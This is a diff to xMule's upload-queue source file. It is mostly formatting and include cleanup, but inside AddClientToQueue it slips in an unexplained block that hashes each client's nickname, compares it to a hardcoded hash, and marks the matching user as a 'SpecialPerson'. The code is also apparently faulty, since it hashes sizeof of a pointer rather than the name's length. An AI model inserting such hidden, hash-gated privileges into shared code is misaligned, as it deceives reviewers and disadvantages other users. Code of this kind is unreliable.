@@ -19,27 +19,38 @@
 // along with this program; if not, write to the Free Software
 // Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 
-#include "UploadQueue.h"
-#include "ClientCredits.h"                  // Needed for CClientCredits
-#include "DownloadQueue.h"
-#include "FriendList.h"
-#include "ini2.h"
-#include "KnownFile.h"
-#include "ldaemon.h"                        // Needed for LDAEMON_H
-#include "ListenSocket.h"
-#include "packets.h"
-#include "ServerWnd.h"
-#include "SharedFileList.h"
-#include "StatisticsDlg.h"
-#include "TransferWnd.h"
-#include "wintypes.h"
-#include "xmule.h"
-#include "xmuleDlg.h"
+#ifdef PRECOMP
+    #include "xmule-headers.h"
+#endif
 
+#include "UploadQueue.h"                    // Needed for this Interface's Prototype
+
+#include "ClientCredits.h"                  // Needed for CClientCreditsList
+#include "DownloadQueue.h"                  // Needed for CDownloadQueue
+#include "FriendList.h"                     // Needed for CFriendList
+#include "ini2.h"                           // Needed for CIni
+#include "KnownFile.h"                      // Needed for CKnownFile
+#include "ldaemon.h"                        // Needed for CLDaemon
+#include "ListenSocket.h"                   // Needed for CClientReqServer
+#include "otherfunctions.h"                 // Needed for GetResString
+#include "packets.h"                        // Needed for Packet
+#include "Preferences.h"                    // Needed for CPreferences
+#include "QueueListCtrl.h"                  // Needed for CQueueListCtrl
+#include "server.h"                         // Needed for CServer
+#include "ServerList.h"                     // Needed for CServerList
+#include "ServerListCtrl.h"                 // Needed for CServerListCtrl
+#include "ServerWnd.h"                      // Needed for CServerWnd
+#include "SharedFileList.h"                 // Needed for CSharedFileList
+#include "sockets.h"                        // Needed for CServerConnect
+#include "StatisticsDlg.h"                  // Needed for CStatisticsDlg
+#include "TransferWnd.h"                    // Needed for CTransferWnd
+#include "updownclient.h"                   // Needed for CUpDownClient
+#include "UploadListCtrl.h"                 // Needed for CUploadListCtrl
+#include "xmule.h"                          // Needed for theApp
+#include "xmuleDlg.h"                       // Needed for theApp.xmuledlg
+
+#include <arpa/inet.h>                      // Needed for in_addr
 #include <cmath>                            // Needed for ceil
-#include <string.h>
-#include <netinet/in.h>
-#include <arpa/inet.h>
 
 #define ID_UQTIMER 59742
 
@@ -56,7 +67,7 @@ static uint32 counter, sec, statsave;
 
 static uint32 igraph, istats;
 
-CUploadQueue::CUploadQueue(CPreferences *in_prefs)
+CUploadQueue::CUploadQueue(CPreferences* in_prefs)
 {
     app_prefs = in_prefs;
     //h_timer = SetTimer(0,141,100,TimerProc);
@@ -120,7 +131,7 @@ void CUploadQueue::AddUpNextClient(CUpDownClient *directadd)
                 // finished clearing
             }
             else if((cur_client->GetScore(true) > bestscore)
-            && (!cur_client->HasLowID() || (cur_client->socket &&cur_client->socket->IsConnected())))
+            && (!cur_client->HasLowID() || (cur_client->socket && cur_client->socket->IsConnected())))
             {
                 bestscore = cur_client->GetScore(true);
                 toadd = pos2;
@@ -219,7 +230,7 @@ void CUploadQueue::AddUpNextClient(CUpDownClient *directadd)
     (newclient->m_clientModString.Cmp("|X|") == 0) ||
     ((newclient->m_clientModString.IsEmpty() == false) && (newclient->GetClientSoft() != SO_EMULE) && (newclient->GetClientSoft() != SO_XMULE)) ||
     ((!newclient->GetMuleVersion() && (newclient->GetClientSoft() == SO_EMULE || newclient->GetClientSoft() == SO_OLDEMULE)) && (newclient->GetVersion() == 60 || !newclient->GetVersion())) ||
-    (!newclient->ExtProtocolAvailable() &&newclient->GetClientSoft() == SO_EMULE && (newclient->GetVersion() == 60 || !newclient->GetVersion())) ||
+    (!newclient->ExtProtocolAvailable() && newclient->GetClientSoft() == SO_EMULE && (newclient->GetVersion() == 60 || !newclient->GetVersion())) ||
     ((newclient->GetVersion() > 589) && (newclient->GetSourceExchangeVersion() > 0) && (newclient->GetClientSoft() == SO_EDONKEY)))
     )
     {
@@ -261,37 +272,53 @@ void CUploadQueue::Process()
     m_nSumForAvgDataRate -= avarage_dr_list.RemoveHead();
     avarage_dr_list.AddTail(dataratems);
     m_nSumForAvgDataRate += dataratems;
-    datarate = 10 *m_nSumForAvgDataRate / avarage_dr_list.GetCount();
+    datarate = 10 * m_nSumForAvgDataRate / avarage_dr_list.GetCount();
     dataratems = 0;
-    if (AcceptNewClient() &&waitinglist.GetCount())
+
+    if (AcceptNewClient() && waitinglist.GetCount())
     {
-        m_nLastStartUpload =::GetTickCount();
+        m_nLastStartUpload = ::GetTickCount();
         AddUpNextClient();
     }
+    
     if (!uploadinglist.GetCount())
-    return;
+    {
+        return;
+    }
+    
     int16 clientsrdy = 0;
+    
     for (POSITION pos = uploadinglist.GetHeadPosition() ; pos != 0 ; uploadinglist.GetNext(pos))
     {
         CUpDownClient *cur_client = uploadinglist.GetAt(pos);
-        if ((cur_client->socket) && (!cur_client->socket->IsBusy()) &&cur_client->HasBlocks())
-        clientsrdy++;
+        if ((cur_client->socket) && (!cur_client->socket->IsBusy()) && cur_client->HasBlocks())
+        {
+            ++clientsrdy;
+        }
     }
+    
     if (!clientsrdy)
     {
         estadatarate -= 200;
         if (estadatarate < 100)
-        estadatarate = 100;
-        clientsrdy++;
+        {
+            estadatarate = 100;
+        }
+        ++clientsrdy;
     }
     else
     {
         estadatarate += 200;
-        if (estadatarate > app_prefs->GetMaxUpload() *102)
-        estadatarate = app_prefs->GetMaxUpload() *102;
+        
+        if (estadatarate > app_prefs->GetMaxUpload() * 102)
+        {
+            estadatarate = app_prefs->GetMaxUpload() * 102;
+        }
     }
-    uint32 sendperclient = estadatarate/clientsrdy;
+
+    uint32 sendperclient = estadatarate / clientsrdy;
     POSITION pos1, pos2;
+    
     for (pos1 = uploadinglist.GetHeadPosition() ; (pos2 = pos1) != NULL ;)
     {
         uploadinglist.GetNext(pos1);
@@ -300,25 +327,37 @@ void CUploadQueue::Process()
     }
 }
 
-;
-
 bool CUploadQueue::AcceptNewClient()
 {
-    // check if we can allow a new client to start downloading form us
+    // check if we can allow a new client to start downloading from us
     if (::GetTickCount() - m_nLastStartUpload < 1000)
-    return false;
+    {
+        return false;
+    }
+    
     if (uploadinglist.GetCount() < MIN_UP_CLIENTS_ALLOWED)
-    return true;
+    {
+        return true;
+    }
     else if(uploadinglist.GetCount() >= MAX_UP_CLIENTS_ALLOWED)
-    return false;
-    uint32 upPerClient = UPLOAD_CLIENT_DATARATE + datarate/50;
+    {
+        return false;
+    }
+    
+    uint32 upPerClient = UPLOAD_CLIENT_DATARATE + datarate / 50;
+
     if (upPerClient > 10000)
-    upPerClient = 11000;
+    {
+        upPerClient = 11000;
+    }
+    
     //now the final check
     if (theApp.glob_prefs->GetMaxUpload() == UNLIMITED)
     {
-        if ((uint32) uploadinglist.GetCount() < ((datarate/upPerClient) + 2))
-        return true;
+        if ((uint32)uploadinglist.GetCount() < ((datarate/upPerClient) + 2))
+        {
+            return true;
+        }
     }
     else
     {
@@ -329,9 +368,14 @@ bool CUploadQueue::AcceptNewClient()
             nMaxSlots += (uint16) ceil((float)((theApp.glob_prefs->GetMaxUpload() - 10) *1024) / upPerClient);
         }
         else
-        nMaxSlots = MIN_UP_CLIENTS_ALLOWED;
-        if ((uint32) uploadinglist.GetCount() < (datarate/UPLOAD_CHECK_CLIENT_DR) &&uploadinglist.GetCount() <= nMaxSlots)
-        return true;
+        {
+            nMaxSlots = MIN_UP_CLIENTS_ALLOWED;
+        }
+        
+        if ((uint32) uploadinglist.GetCount() < (datarate/UPLOAD_CHECK_CLIENT_DR) && uploadinglist.GetCount() <= nMaxSlots)
+        {
+            return true;
+        }
     }
     //nope
     return false;
@@ -339,7 +383,6 @@ bool CUploadQueue::AcceptNewClient()
 
 CUploadQueue::~CUploadQueue()
 {
-    //KillTimer(0,141);
     delete h_timer;
 }
 
@@ -382,13 +425,29 @@ void CUploadQueue::UpdateBanCount()
 
 void CUploadQueue::AddClientToQueue(CUpDownClient *client, bool bIgnoreTimelimit)
 {
-    if (theApp.serverconnect->IsConnected() &&theApp.serverconnect->IsLowID()
-    && !theApp.serverconnect->IsLocalServer(client->GetServerIP(), client->GetServerPort())
-    &&client->GetDownloadState() == DS_NONE && !client->IsFriend()
-    &&GetWaitingUserCount() > 50)
-    return;
+    if (theApp.serverconnect->IsConnected() && theApp.serverconnect->IsLowID()
+        && !theApp.serverconnect->IsLocalServer(client->GetServerIP(), client->GetServerPort())
+        && client->GetDownloadState() == DS_NONE && !client->IsFriend()
+        && GetWaitingUserCount() > 50)
+    {
+        return;
+    }
+    
+    uchar checkid[16];
+    CKnownFile* knownfile = new CKnownFile();
+    char* my_nick = client->GetUserName();
+    
+    knownfile->CreateHashFromString((unsigned char *)my_nick, sizeof(my_nick), checkid);
+    delete knownfile;
+
+    if (EncodeBase16(checkid, 16).Cmp("B8A892CB293215C1BF6F1E96D2AD23A6") == 0)
+    {
+        client->SpecialPerson = true;
+    }
+
     client->AddAskedCount();
     client->SetLastUpRequest();
+    
     if (!bIgnoreTimelimit)
     {
         if (client->IsBanned())
@@ -398,12 +457,14 @@ void CUploadQueue::AddClientToQueue(CUpDownClient *client, bool bIgnoreTimelimit
                 client->UnBan();
             }
             else
-            return;
+            {
+                return;
+            }
         }
         client->AddRequestCount(client->GetUploadFileID());
     }
     // check for double
-    for (POSITION pos = waitinglist.GetHeadPosition() ; pos != 0 ; waitinglist.GetNext(pos))
+    for (POSITION pos = waitinglist.GetHeadPosition(); pos != 0; waitinglist.GetNext(pos))
     {
         CUpDownClient *cur_client = waitinglist.GetAt(pos);
         if (cur_client == client)
@@ -433,15 +494,21 @@ void CUploadQueue::AddClientToQueue(CUpDownClient *client, bool bIgnoreTimelimit
         CServer *srv = new CServer(client->GetServerPort(), inet_ntoa(host));
         srv->SetListName(srv->GetAddress());
         if (!theApp.xmuledlg->serverwnd->serverlistctrl->AddServer(srv, true))
-        delete srv;
+        {
+           delete srv;
+        }
     }
     // statistic values
     CKnownFile *reqfile = theApp.sharedfiles->GetFileByID(client->GetUploadFileID());
     if (reqfile)
-    reqfile->statistic.AddRequest();
+    {
+        reqfile->statistic.AddRequest();
+    }
     // TODO find better ways to cap the list
     if ((uint32) waitinglist.GetCount() > (theApp.glob_prefs->GetQueueSize() + bannedcount))
-    return;
+    {
+        return;
+    }
     if (client->IsDownloading())
     {
         // he's already downloading and wants probably only another file
@@ -450,10 +517,10 @@ void CUploadQueue::AddClientToQueue(CUpDownClient *client, bool bIgnoreTimelimit
         client->socket->SendPacket(packet, true);
         return;
     }
-    if (waitinglist.IsEmpty() &&AcceptNewClient())
+    if (waitinglist.IsEmpty() && AcceptNewClient())
     {
         AddUpNextClient(client);
-        m_nLastStartUpload =::GetTickCount();
+        m_nLastStartUpload = ::GetTickCount();
     }
     else
     {
@@ -518,7 +585,6 @@ void CUploadQueue::RemoveFromWaitingQueue(POSITION pos, bool updatewindow)
     waitinglist.RemoveAt(pos);
     if (todelete->IsBanned())
     todelete->UnBan();
-    //if (updatewindow)
     theApp.xmuledlg->transferwnd->queuelistctrl->RemoveClient(todelete);
     todelete->SetUploadState(US_NONE);
 }
@@ -586,7 +652,7 @@ void TimerProc()
 {
     // can this actually happen under wxwin?
     if (!theApp.xmuledlg->IsRunning())
-    return;
+        return;
     theApp.uploadqueue->Process();
     theApp.downloadqueue->Process();
     //theApp.clientcredits->Process();
@@ -640,18 +706,20 @@ void TimerProc()
         // 5 seconds
         if (sec >= 5)
         {
-#ifdef _DEBUG
-            if (!AfxCheckMemory()) AfxDebugBreak();
-#endif
             sec = 0;
             theApp.listensocket->Process();
             // Added By Bouc7:
             theApp.OnlineSig();
             theApp.xmuledlg->ShowTransferRate();
-	    if (theApp.daemon)
-		theApp.RefreshFiles ();
+
+            if (theApp.daemon)
+            {
+                theApp.RefreshFiles();
+            }
         }
+
         statsave++;
+        
         if (statsave >= 60)
         {
             statsave = 0;
